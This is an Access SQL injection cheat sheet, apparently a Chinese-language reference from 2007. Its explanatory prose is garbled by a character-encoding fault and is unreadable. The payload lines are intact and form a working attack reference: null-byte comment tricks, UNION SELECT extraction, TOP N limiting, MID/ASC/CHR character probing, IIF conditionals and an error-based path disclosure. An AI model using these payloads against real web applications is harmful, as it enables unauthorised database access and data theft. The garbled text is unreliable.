ÕûÀí±È½ÏÈ«µÄAccess SQL×¢Èë²Î¿¼

 Access SQL×¢Èë²Î¿¼
°æ±¾ 0.2.1
(×î½ü¸üР10/10/2007)
Ô­×÷Õß²»Ïê
 
ÃèÊö SQL²éѯ¼°×¢ÊÍ
×¢ÊÍ·û AccessÖÐûÓÐרÃŵÄ×¢ÊÍ·ûºÅ.Òò´Ë"/*", "--"ºÍ"#"¶¼Ã»·¨Ê¹ÓÃ.µ«ÊÇ¿ÉÒÔʹÓÿÕ×Ö·û"NULL"(%00)´úÌæ:
' UNION SELECT 1,1,1 from validTableName%00
 
Óï·¨´íÎóÐÅÏ¢ "[Microsoft][Driver ODBC Microsoft Access]"
¶à¾äÖ´ÐÐ ²»Ö§³Ö.
ÁªºÏ²éѯ AccessÖ§³ÖÁªºÏ²éѯ,UNIONºóµÄfrom¹Ø¼ü×Ö±ØÐëʹÓÃÒ»¸öÒѾ­´æÔڵıíÃû.
¸½Êô²éѯ AccessÖ§³Ö¸½Êô²éѯ(ÀýÈç:"TOP 1"ÓÃÀ´·µ»ØµÚÒ»ÐеÄÄÚÈÝ) :
' AND (SELECT TOP 1 'someData' from validTableName)%00
 
LIMITÖ§³Ö LIMIT²»±»Ö§³Ö,µ«ÊÇÔÚ²éѯÖпÉÒÔÉùÃ÷"TOP N"À´ÏÞÖÆ·µ»ØÄÚÈݵÄÐÐÊý:
' UNION SELECT TOP 3 AttrName from validTableName%00 : ÕâÌõÓï¾ä·µ»Ø(Ç°)3 ÐÐ.
 
Èòéѯ·µ»Ø0ÐÐ Ôڽű¾ÔÚ·µ»ØµÄHTML½á¹ûÖÐÖ»ÏÔʾµÚÒ»¸ö²éѯµÄ½á¹ûµÄʱºò·Ç³£ÓÐÓÃ:
' AND 1=0 UNION SELECT AttrName1,AttrName2 from validTableName%00
 
×Ö·û´®Á¬½Ó ²»Ö§³ÖCONCAT()º¯Êý. ¿ÉÒÔʹÓÃ"&"»ò"+"²Ù×÷À´Á©½ÓÁ½¸ö×Ö·û´®.ÔÚʹÓõÄʱºî±ØÐë¶ÔÕâÁ½¸ö²Ù×÷·û½øÐÐURLencode±àÂë:
' UNION SELECT 'web' %2b 'app' from validTableName%00 : ·µ»Ø"webapp"
' UNION SELECT 'web' %26 'app' from validTableName%00 : ·µ»Ø"webapp"
 
×Ó×Ö·û´® MID()º¯Êý:
' UNION SELECT MID('abcd',1,1) from validTableName%00 : ·µ»Ø "a"
' UNION SELECT MID('abcd',2,1) from validTableName%00 : ·µ»Ø "b"
 
×Ö·û´®³¤¶È LEN()º¯Êý:
' UNION SELECT LEN('1234') from validTableName%00 : ·µ»Ø 4
 
±©WEB·¾¶ ¿ÉÒÔͨ¹ý¶ÔÒ»¸ö²»´æÔڵĿâ½øÐÐSELECT²Ù×÷.Access½«»á»ØÓ¦Ò»Ìõ°üº¬ÓÐÍêÕû·¾¶µÄ´íÎóÐÅÏ¢.:
' UNION SELECT 1 from ThisIsAFakeName.FakeTable%00
 
È¡×Ö·ûµÄASCIIÖµ ASC()º¯Êý:
' UNION SELECT ASC('A') from ValidTable%00 :·µ»Ø65 ('A'µÄASCIIÖµ)
 
ASCIIֵת»»Îª×Ö·û CHR()º¯Êý:
' UNION SELECT CHR(65) from validTableName%00 : ·µ»Ø 'A'
 
IFÓï¾ä ¿ÉÒÔʹÓÃIIF()º¯Êý. Óï·¨ : IIF(condition, true, false) :
' UNION SELECT IIF(1=1, 'a', 'b') from validTableName%00 : ·µ»Ø 'a'
 
ʱ¼ä½Ó¿Ú ²»´æÔÚÀàËÆBENCHMARK()»òSLEEP()µÄº¯Êý,µ«ÊÇ¿ÉÒÔʹÓôóÁ¿(¸ß¸ºÔØ)µÄ²éѯÀ´´ïµ½Õâ¸öЧ¹û.µã»÷ÕâÀï²é¿´²Î¿¼.